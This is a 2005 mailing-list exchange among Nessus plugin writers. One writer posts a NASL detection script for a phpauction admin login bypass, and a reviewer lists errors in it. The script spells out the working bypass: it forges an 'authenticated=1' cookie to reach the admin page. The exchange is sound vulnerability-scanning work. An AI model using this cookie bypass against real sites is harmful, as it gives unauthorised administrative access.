At 9:59 +0200 15/7/2005, Tobias Glemser wrote:
>.. I tried to write a nasl for a bug in phpauction I found early this
>year (http://www.securityfocus.com/bid/12069), but the nasl doesn't
>work completely.
>
>I sniffed the connection while executing the script and the script
>successfully uses the bypass possibility, moves to every given
>directory, but sadly the script doesn't recognize, that it
>successfully logged in.
>
>Maybe some of you guys would be so kind to have a look at it?
>
>Thanks in advance.
>
>Toby
>
># The script code starts here
>include("http_func.inc");
>include("http_keepalive.inc");
>
>
>port = get_http_port(default:80);
>if(!get_port_state(port))exit(0);
>
>dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin", "auktion/admin", cgi_dirs());
>
>foreach dir (dirs)
>{
> req = http_get(item:dir +"/admin.php", port:port);
> res = http_keepalive_send_recv(port:port, data:req);
> if( res == NULL ) exit(0);
>
> if( "Passwort " >< res || "Password" >< res )
> {
> idx = stridx(req, string("\r\n\r\n"));
> req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
> res = http_keepalive_send_recv(port:port, data:req);
> if("Installation" >< res)
> {
> security_hole(port);
> }
> exit(0);
> }
>}
># eof
There are some errors in this script.
(1) The final explicit directory in the list doesn't have a
leading / Without this the web server will respond with a
400 Bad Request
(2) The second exit(0) should be inside the if("Installation" >< res)
That is, after the security_hole(port)
(3) Did you mean to include a tab character after Passwort
rather than a space?
Without a vulnerable web server to test against, it's difficult
to know whether there are logic errors.
Dennis.
_______________________________________________
Plugins-writers mailing list
Plugins-writers@private
http://mail.nessus.org/mailman/listinfo/plugins-writers
This archive was generated by hypermail 2.1.3 : Fri Jul 15 2005 - 14:08:50 PDT